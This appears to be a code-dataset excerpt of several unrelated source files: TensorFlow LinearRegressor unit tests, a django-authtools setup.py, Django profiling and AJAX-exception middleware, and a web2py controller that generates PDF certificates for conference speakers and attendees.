self, tf.contrib.learn.LinearRegressor)
def testRegression(self):
"""Tests that loss goes down with training."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[10.]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearRegressor(
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=100)
loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
classifier.fit(input_fn=input_fn, steps=200)
loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss2, loss1)
self.assertLess(loss2, 0.5)
def testRegression_MatrixData(self):
"""Tests regression using matrix data as input."""
cont_features = [
tf.contrib.layers.real_valued_column('feature', dimension=4)]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=cont_features,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_iris_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_iris_input_fn, steps=1)
self.assertLess(scores['loss'], 0.2)
def testRegression_TensorData(self):
"""Tests regression using tensor data as input."""
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant([1.0, 0., 0.2], dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.2)
def testLoss(self):
"""Tests loss calculation."""
def _input_fn_train():
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
# The algorithm should learn (y = 0.25).
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
}
return features, labels
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn_train, steps=100)
scores = regressor.evaluate(input_fn=_input_fn_train, steps=1)
# Average square loss = (0.75^2 + 3*0.25^2) / 4 = 0.1875
self.assertAlmostEqual(0.1875, scores['loss'], delta=0.1)
def testLossWithWeights(self):
"""Tests loss calculation with weights."""
def _input_fn_train():
# 4 rows with equal weight, one of them (y = x), three of them (y=Not(x))
# The algorithm should learn (y = 0.25).
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[1.], [1.], [1.], [1.]])
}
return features, labels
def _input_fn_eval():
# 4 rows, with different weights.
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[7.], [1.], [1.], [1.]])
}
return features, labels
regressor = tf.contrib.learn.LinearRegressor(
weight_column_name='w',
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn_train, steps=100)
scores = regressor.evaluate(input_fn=_input_fn_eval, steps=1)
# Weighted average square loss = (7*0.75^2 + 3*0.25^2) / 10 = 0.4125
self.assertAlmostEqual(0.4125, scores['loss'], delta=0.1)
def testTrainWithWeights(self):
"""Tests training with given weight column."""
def _input_fn_train():
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
      # First row has more weight than others. Model should fit (y=x) better
      # than (y=Not(x)) due to the relatively higher weight of the first row.
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[100.], [3.], [2.], [2.]])
}
return features, labels
def _input_fn_eval():
# Create 4 rows (y = x)
labels = tf.constant([[1.], [1.], [1.], [1.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[1.], [1.], [1.], [1.]])
}
return features, labels
regressor = tf.contrib.learn.LinearRegressor(
weight_column_name='w',
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn_train, steps=100)
scores = regressor.evaluate(input_fn=_input_fn_eval, steps=1)
# The model should learn (y = x) because of the weights, so the loss should
# be close to zero.
self.assertLess(scores['loss'], 0.1)
def testPredict_AsIterableFalse(self):
"""Tests predict method with as_iterable=False."""
labels = [1.0, 0., 0.2]
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant(labels, dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.1)
predictions = regressor.predict(input_fn=_input_fn, as_iterable=False)
self.assertAllClose(labels, predictions, atol=0.1)
def testPredict_AsIterable(self):
"""Tests predict method with as_iterable=True."""
labels = [1.0, 0., 0.2]
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant(labels, dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.1)
predict_input_fn = functools.partial(_input_fn, num_epochs=1)
predictions = list(
regressor.predict(input_fn=predict_input_fn, as_iterable=True))
self.assertAllClose(labels, predictions, atol=0.1)
def testCustomMetrics(self):
"""Tests custom evaluation metrics."""
def _input_fn(num_epochs=None):
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {'x': tf.train.limit_epochs(
tf.ones(shape=[4, 1], dtype=tf.float32), num_epochs=num_epochs)}
return features, labels
def _my_metric_op(predictions, labels):
return tf.reduce_sum(tf.mul(predictions, labels))
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(
input_fn=_input_fn,
steps=1,
metrics={
'my_error': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_mean_squared_error,
prediction_key='scores'),
'my_metric': MetricSpec(metric_fn=_my_metric_op,
prediction_key='scores')
})
self.assertIn('loss', set(scores.keys()))
self.assertIn('my_error', set(scores.keys()))
self.assertIn('my_metric', set(scores.keys()))
predict_input_fn = functools.partial(_input_fn, num_epochs=1)
predictions = np.array(list(regressor.predict(input_fn=predict_input_fn)))
self.assertAlmostEqual(
_sklearn.mean_squared_error(np.array([1, 0, 0, 0]), predictions),
scores['my_error'])
# Tests the case where the prediction_key is not "scores".
with self.assertRaisesRegexp(KeyError, 'bad_type'):
regressor.evaluate(
input_fn=_input_fn,
steps=1,
metrics={
'bad_name': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_auc,
prediction_key='bad_type')})
# Tests the case where the 2nd element of the key is not "scores".
with self.assertRaises(KeyError):
regressor.evaluate(
input_fn=_input_fn,
steps=1,
metrics={('my_error', 'predictions'
): tf.contrib.metrics.streaming_mean_squared_error})
# Tests the case where the tuple of the key doesn't have 2 elements.
with self.assertRaises(ValueError):
regressor.evaluate(
input_fn=_input_fn,
steps=1,
metrics={
('bad_length_name', 'scores', 'bad_length'):
tf.contrib.metrics.streaming_mean_squared_error
})
def testTrainSaveLoad(self):
"""Tests that insures you can save and reload a trained model."""
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant([1.0, 0., 0.2], dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
model_dir = tempfile.mkdtemp()
regressor = tf.contrib.learn.LinearRegressor(
model_dir=model_dir,
feature_columns=feature_columns,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
predict_input_fn = functools.partial(_input_fn, num_epochs=1)
predictions = list(regressor.predict(input_fn=predict_input_fn))
del regressor
regressor2 = tf.contrib.learn.LinearRegressor(
model_dir=model_dir,
feature_columns=feature_columns)
predictions2 = list(regressor2.predict(input_fn=predict_input_fn))
self.assertAllClose(predictions, predictions2)
def testTrainWithPartitionedVariables(self):
"""Tests training with partitioned variables."""
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant([1.0, 0., 0.2], dtype=tf.float32)
feature_columns = [
# The given hash_bucket_size results in variables larger than the
# default min_slice_size attribute, so the variables are partitioned.
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=2e7),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
# Because we did not start a distributed cluster, we need to pass an
# empty ClusterSpec, otherwise the device_setter will look for
# distributed jobs, such as "/job:ps" which are not present.
config=tf.contrib.learn.RunConfig(
num_ps_replicas=2, cluster_spec=tf.train.ClusterSpec({}),
tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.1)
def testDisableCenteredBias(self):
"""Tests that we can disable centered bias."""
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant([1.0, 0., 0.2], dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
enable_centered_bias=False,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.1)
def testRecoverWeights(self):
rng = np.random.RandomState(67)
n = 1000
n_weights = 10
bias = 2
x = rng.uniform(-1, 1, (n, n_weights))
weights = 10 * rng.randn(n_weights)
y = np.dot(x, weights)
y += rng.randn(len(x)) * 0.05 + rng.normal(bias, 0.01)
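    # Targets are a noisy linear function of x plus a constant bias near 2.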
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(x)
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
optimizer=tf.train.FtrlOptimizer(learning_rate=0.8))
regressor.fit(x, y, batch_size=64, steps=2000)
# Have to flatten weights since they come in (x, 1) shape.
self.assertAllClose(weights, regressor.weights_.flatten(), rtol=1)
# TODO(ispir): Disable centered_bias.
# assert abs(bias - regressor.bias_) < 0.1
def testSdcaOptimizerRealValuedLinearFeatures(self):
"""Tests LinearRegressor with SDCAOptimizer and real valued features."""
x = [[1.2, 2.0, -1.5], [-2.0, 3.0, -0.5], [1.0, -0.5, 4.0]]
weights = [[3.0], [-1.2], [0.5]]
y = np.dot(x, weights)
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'x': tf.constant(x),
'weights': tf.constant([[10.0], [10.0], [10.0]])
}, tf.constant(y)
x_column = tf.contrib.layers.real_valued_column('x', dimension=3)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[x_column],
weight_column_name='weights',
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=20)
loss = regressor.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.01)
self.assertAllClose([w[0] for w in weights],
regressor.weights_.flatten(), rtol=0.1)
def testSdcaOptimizerMixedFeaturesArbitraryWeights(self):
"""Tests LinearRegressor with SDCAOptimizer and a mix of features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[0.6], [0.8], [0.3]]),
'sq_footage': tf.constant([[900.0], [700.0], [600.0]]),
'country': tf.SparseTensor(
values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 3], [2, 1]],
shape=[3, 5]),
'weights': tf.constant([[3.0], [5.0], [7.0]])
}, tf.constant([[1.55], [-1.25], [-3.0]])
price = tf.contrib.layers.real_valued_column('price')
sq_footage_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column('sq_footage'),
boundaries=[650.0, 800.0])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
sq_footage_country = tf.contrib.layers.crossed_column(
[sq_footage_bucket, country], hash_bucket_size=10)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id', symmetric_l2_regularization=1.0)
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[price, sq_footage_bucket, country, sq_footage_country],
weight_column_name='weights',
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=20)
loss = regressor.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.05)
def testSdcaOptimizerSparseFeaturesWithL1Reg(self):
"""Tests LinearClasssifier with SDCAOptimizer and sparse features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[0.4], [0.6], [0.3]]),
'country': tf.SparseTensor(
values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 3], [2, 1]],
shape=[3, 5]),
'weights': tf.constant([[10.0], [10.0], [10.0]])
}, tf.constant([[1.4], [-0.8], [2.6]])
price = tf.contrib.layers.real_valued_column('price')
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
# Regressor with no L1 regularization.
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[price, country],
weight_column_name='weights',
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=20)
no_l1_reg_loss = regressor.evaluate(input_fn=input_fn, steps=1)['loss']
no_l1_reg_weights = regressor.weights_
# Regressor with L1 regularization.
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id', symmetric_l1_regularization=1.0)
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[price, country],
weight_column_name='weights',
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=20)
l1_reg_loss = regressor.evaluate(input_fn=input_fn, steps=1)['loss']
l1_reg_weights = regressor.weights_
# Unregularized loss is lower when there is no L1 regularization.
self.assertLess(no_l1_reg_loss, l1_reg_loss)
self.assertLess(no_l1_reg_loss, 0.05)
# But weights returned by the regressor with L1 regularization have smaller
# L1 norm.
l1_reg_weights_norm, no_l1_reg_weights_norm = 0.0, 0.0
for var_name in sorted(l1_reg_weights):
l1_reg_weights_norm += sum(
np.absolute(l1_reg_weights[var_name].flatten()))
no_l1_reg_weights_norm += sum(
np.absolute(no_l1_reg_weights[var_name].flatten()))
print('Var name: %s, value: %s' %
(var_name, no_l1_reg_weights[var_name].flatten()))
self.assertLess(l1_reg_weights_norm, no_l1_reg_weights_norm)
def testSdcaOptimizerBiasOnly(self):
"""Tests LinearClasssifier with SDCAOptimizer and validates bias weight."""
def input_fn():
"""Testing the bias weight when it's the only feature present.
All of the instances in this input only have the bias feature, and a
1/4 of the labels are positive. This means that the expected weight for
the bias should be close to the average prediction, i.e 0.25.
Returns:
Training data for the test.
"""
num_examples = 40
return {
'example_id': tf.constant([str(x+1) for x in range(num_examples)]),
# place_holder is an empty column which is always 0 (absent), because
# LinearClassifier requires at least one column.
'place_holder': tf.constant([[0.0]]*num_examples),
      }, tf.constant([[1 if i % 4 == 0 else 0] for i in range(num_examples)])
place_holder = tf.contrib.layers.real_valued_column('place_holder')
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[place_holder],
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=100)
self.assertNear(regressor.get_variable_value('linear/bias_weight')[0],
0.25, err=0.1)
def testSdcaOptimizerBiasAndOtherColumns(self):
"""Tests LinearClasssifier with SDCAOptimizer and validates bias weight."""
def input_fn():
"""Testing the bias weight when there are other features present.
1/2 of the instances in this input have feature 'a', the rest have
feature 'b', and we expect the bias to be added to each instance as well.
0.4 of all instances that have feature 'a' are positive, and 0.2 of all
instances that have feature 'b' are positive. The labels in the dataset
are ordered to appear shuffled since SDCA expects shuffled data, and
converges faster with this pseudo-random ordering.
If the bias was centered we would expect the weights to be:
bias: 0.3
a: 0.1
b: -0.1
Until b/29339026 is resolved, the bias gets regularized with the same
global value for the other columns, and so the expected weights get
shifted and are:
bias: 0.2
a: 0.2
b: 0.0
Returns:
The test dataset.
"""
num_examples = 200
half = int(num_examples/2)
return {
'example_id': tf.constant([str(x+1) for x in range(num_examples)]),
'a': tf.constant([[1]]*int(half) + [[0]]*int(half)),
'b': tf.constant([[0]]*int(half) + [[1]]*int(half)),
}, tf.constant([[x] for x in
[1, 0, 0, 1, 1, 0, 0, 0, 1, 0] * int(half/10) +
[0, 1, 0, 0, 0, 0, 0, 0, 1, 0] * int(half/10)])
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[tf.contrib.layers.real_valued_column('a'),
tf.contrib.layers.real_valued_column('b')],
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=200)
# TODO(b/29339026): Change the expected results to expect a centered bias.
self.assertNear(
regressor.get_variable_value('linear/bias_weight')[0], 0.2, err=0.05)
self.assertNear(regressor.weights_['linear/a/weight'][0], 0.2, err=0.05)
self.assertNear(regressor.weights_['linear/b/weight'][0], 0.0, err=0.05)
def testSdcaOptimizerBiasAndOtherColumnsFabricatedCentered(self):
"""Tests LinearClasssifier with SDCAOptimizer and validates bias weight."""
def input_fn():
"""Testing the bias weight when there are other features present.
1/2 of the instances in this input have feature 'a', the rest have
feature 'b', and we expect the bias to be added to each instance as well.
0.1 of all instances that have feature 'a' have a label of 1, and 0.1 of
all instances that have feature 'b' have a label of -1.
We can expect the weights to be:
bias: 0.0
a: 0.1
b: -0.1
Returns:
The test dataset.
"""
num_examples = 200
half = int(num_examples/2)
return {
'example_id': tf.constant([str(x+1) for x in range(num_examples)]),
'a': tf.constant([[1]]*int(half) + [[0]]*int(half)),
'b': tf.constant([[0]]*int(half) + [[1]]*int(half)),
}, tf.constant([[1 if x%10 == 0 else 0] for x in range(half)] +
[[-1 if x%10 == 0 else 0] for x in range(half)])
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[tf.contrib.layers.real_valued_column('a'),
tf.contrib.layers.real_valued_column('b')],
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=100)
self.assertNear(
regressor.get_variable_value('linear/bias_weight')[0], 0.0, err=0.05)
self.assertNear(regressor.weights_['linear/a/weight'][0], 0.1, err=0.05)
self.assertNear(regressor.weights_['linear/b/weight'][0], -0.1, err=0.05)
def boston_input_fn():
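  """Returns the Boston housing features and target values as float32 tensors."""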
boston = tf.contrib.learn.datasets.load_boston()
features = tf.cast(tf.reshape(tf.constant(boston.data), [-1, 13]), tf.float32)
labels = tf.cast(tf.reshape(tf.constant(boston.target), [-1, 1]), tf.float32)
return features, labels
class FeatureColumnTest(tf.test.TestCase):
def testTrain(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
boston_input_fn)
est = tf.contrib.learn.LinearRegressor(feature_columns=feature_columns)
est.fit(input_fn=boston_input_fn, steps=1)
_ = est.evaluate(input_fn=boston_input_fn, steps=1)
if __name__ == '__main__':
tf.test.main()
|
tongwang01/tensorflow
|
tensorflow/contrib/learn/python/learn/estimators/linear_test.py
|
Python
|
apache-2.0
| 59,870
|
#!/usr/bin/env python
from setuptools import setup, find_packages
import os
import io
__doc__ = ("Custom user model app for Django featuring email as username and"
" class-based views for authentication.")
def read(fname):
return io.open(os.path.join(os.path.dirname(__file__), fname), encoding="utf-8").read()
install_requires = [
'Django>=1.5',
]
setup(
name='django-authtools',
version='1.2.1.dev0',
author='Fusionbox, Inc.',
author_email='programmers@fusionbox.com',
description=__doc__,
long_description='\n\n'.join([read('README.rst'), read('CHANGES.rst')]),
url='https://django-authtools.readthedocs.org/',
license='BSD',
packages=[package for package in find_packages() if package.startswith('authtools')],
install_requires=install_requires,
zip_safe=False,
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
],
)
|
vuchau/django-authtools
|
setup.py
|
Python
|
bsd-2-clause
| 1,342
|
# python imports
import hotshot
import hotshot.stats
import sys
import tempfile
from cStringIO import StringIO
# django imports
from django.conf import settings
from django.http import HttpResponseServerError
class ProfileMiddleware(object):
"""
Displays hotshot profiling for any view.
http://yoursite.com/yourview/?prof
Add the "prof" key to query string by appending ?prof (or &prof=)
and you'll see the profiling results in your browser.
It's set up to only be available in django's debug mode,
but you really shouldn't add this middleware to any production configuration.
* Only tested on Linux
"""
def process_request(self, request):
if 'prof' in request.GET:
self.tmpfile = tempfile.NamedTemporaryFile()
self.prof = hotshot.Profile(self.tmpfile.name)
def process_view(self, request, callback, callback_args, callback_kwargs):
if 'prof' in request.GET:
return self.prof.runcall(callback, request, *callback_args, **callback_kwargs)
def process_response(self, request, response):
if 'prof' in request.GET:
self.prof.close()
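            # hotshot.stats prints to stdout, so temporarily capture stdout in
            # a StringIO while the stats are formatted, then restore it.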
out = StringIO()
old_stdout = sys.stdout
sys.stdout = out
stats = hotshot.stats.load(self.tmpfile.name)
# stats.strip_dirs()
stats.sort_stats('cumulative', )
# stats.sort_stats('time', )
stats.print_stats()
sys.stdout = old_stdout
stats_str = out.getvalue()
if response and response.content and stats_str:
response.content = "<pre>" + stats_str + "</pre>"
return response
class AJAXSimpleExceptionResponse:
def process_exception(self, request, exception):
if settings.DEBUG:
if request.is_ajax():
import sys
import traceback
                (exc_type, exc_value, tb) = sys.exc_info()
                response = "%s\n" % exc_type.__name__
                response += "%s\n\n" % exc_value
                response += "TRACEBACK:\n"
                for line in traceback.format_tb(tb):
                    response += "%s\n" % line
return HttpResponseServerError(response)
|
pigletto/django-lfs
|
lfs/utils/middleware.py
|
Python
|
bsd-3-clause
| 2,254
|
# coding: utf8
# try something like
try:
from gluon.contrib.pyfpdf import Template
except ImportError:
# import local module until we can update web2py...
Template = local_import('template').Template
@auth.requires_membership(role="manager")
def speakers():
template_id = int(request.args[0])
speakers = db(db.auth_user.speaker==True).select(orderby=db.auth_user.id)
return render_pdf(speakers, template_id, "Disertante", "S")
@auth.requires_membership(role="manager")
def attendees():
template_id = int(request.args[0])
q = db.auth_user.speaker==False
q &= db.auth_user.id > int(request.args[1])
q &= db.auth_user.attendee_type == "gratis"
speakers = db(q).select(orderby=db.auth_user.id)
return render_pdf(speakers, template_id, "Participante", "A")
@auth.requires_membership(role="manager")
def bono():
template_id = int(request.args[0])
q = db.auth_user.speaker==False
q &= db.auth_user.attendee_type != "gratis"
q &= db.auth_user.id > int(request.args[1])
speakers = db(q).select(orderby=db.auth_user.id)
return render_pdf(speakers, template_id, "Participante", "B")
def render_pdf(users, template_id, attendee_type, flag=""):
# read elements from db
elements = db(db.pdf_element.pdf_template_id==template_id).select(orderby=db.pdf_element.priority)
f = Template(format="A4",
elements = elements,
title="Speaker Certificate", author="web2conf",
orientation="Landscape",
subject="", keywords="")
# fill placeholders for each page
for user in users:
f.add_page()
s = unicode("%s %s" % (user.first_name, user.last_name), "utf8")
if user.dni:
s = u"%s (DNI %s)" % (s, user.dni)
f['name'] = s
f['id'] = "%s%s" % (user.id, flag)
f['attendee_type'] = attendee_type
#break
response.headers['Content-Type']='application/pdf'
return f.render('speaker_cert.pdf', dest='S')
|
bkahlerventer/web2congress
|
controllers/certificate.py
|
Python
|
bsd-3-clause
| 2,022
|